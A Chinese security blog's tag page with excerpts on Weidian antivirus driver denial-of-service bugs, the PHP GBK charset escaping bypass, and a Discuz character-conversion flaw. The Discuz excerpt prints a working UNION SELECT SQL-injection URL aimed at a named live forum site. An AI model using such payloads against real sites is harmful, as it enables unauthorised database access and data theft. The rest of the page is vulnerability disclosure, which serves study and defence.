标签 ‘漏洞’ 下的日志
微点主动防御(version20080924及以下)多个拒绝服务漏洞之三
作者:MJ0011
继续爆三个漏洞,微点一直没反映啊~看来都度假去了 这样可不行啊 病毒木马可是不休假的哦 O(∩_∩)O哈哈~
(1).微点对NtWriteFile-> Call ObReferenceObjectByHandle的HOOK中未对参数做有效性检查,可导致任意权限用户在安装了微点的系统上可引发系统蓝屏
存在漏洞的文件:mp110011.sys,版本:1.2.10237,CheckSum = 0x0002291a , TimeStamp = 0x488944d9
微点hook了NtWriteFile-> Call ObReferenceObjectByHandle并对其中的FileHandle进行检查,检查对应的设备对象->驱动对象是否是Disk,如果是的话,判断写入的偏移,进行阻截或放行
阅读全文 »
微点主动防御(version20080924及以下)多个拒绝服务漏洞之二
作者:MJ0011
国庆的早晨啊~再多爆料几个有问题的函数~~
参考文一:http://hi.baidu.com/mj0011/blog/item/e9bcc4390265fbf53a87ceb8.html
除了文一提到的两个函数~微点的内核驱动中实际存在着大量这样的问题
再提两个函数,也省得微点的工程师累死累活的找了~学习雷锋啊好榜样~~
(1). 对ZwDeleteValueKey 的HOOK函数对用户态参数没有做检查,导致任何权限用户在安装了微点的系统上可引发蓝屏
处理函数位于mp110009.sys, 版本:1.2.10045 ,CheckSum = 0xCC78 , TimeStamp = 0x48478FCF
阅读全文 »
PHP字符编码绕过漏洞总结
作者:Safe3
其实这东西国内少数黑客早已知道,只不过没有共享公布而已。有些人是不愿共享,宁愿烂在地里,另外的一些则是用来牟利。
该漏洞最早2006年被国外用来讨论数据库字符集设为GBK时,0xbf27本身不是一个有效的GBK字符,但经过 addslashes() 转换后变为0xbf5c27,前面的0xbf5c是个有效的GBK字符,所以0xbf5c27会被当作一个字符0xbf5c和一个单引号来处理,结果漏洞就触发了。
mysql_real_escape_string() 也存在相同的问题,只不过相比 addslashes() 它考虑到了用什么字符集来处理,因此可以用相应的字符集来处理字符。在MySQL 中有两种改变默认字符集的方法。
阅读全文 »
DISCUZ字符转码漏洞
来源:凋凌玫瑰’s blog
最近出来的php第三方编码转换类漏洞又要死一大批php站了。
先是phpwind接着又是discuz论坛
编码转换没处理的都会存在这类漏洞了
phpwind的大家都知道了,今天群里还有人不知道discuz的。
顺便在群里看到个discuz论坛的站,发出来就都知道咋注了。
http://bbs.hefei.cc/space.php?username=%cf’%20UNION%20Select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,database(),83/*
我个人还是比较反对四处黑站的。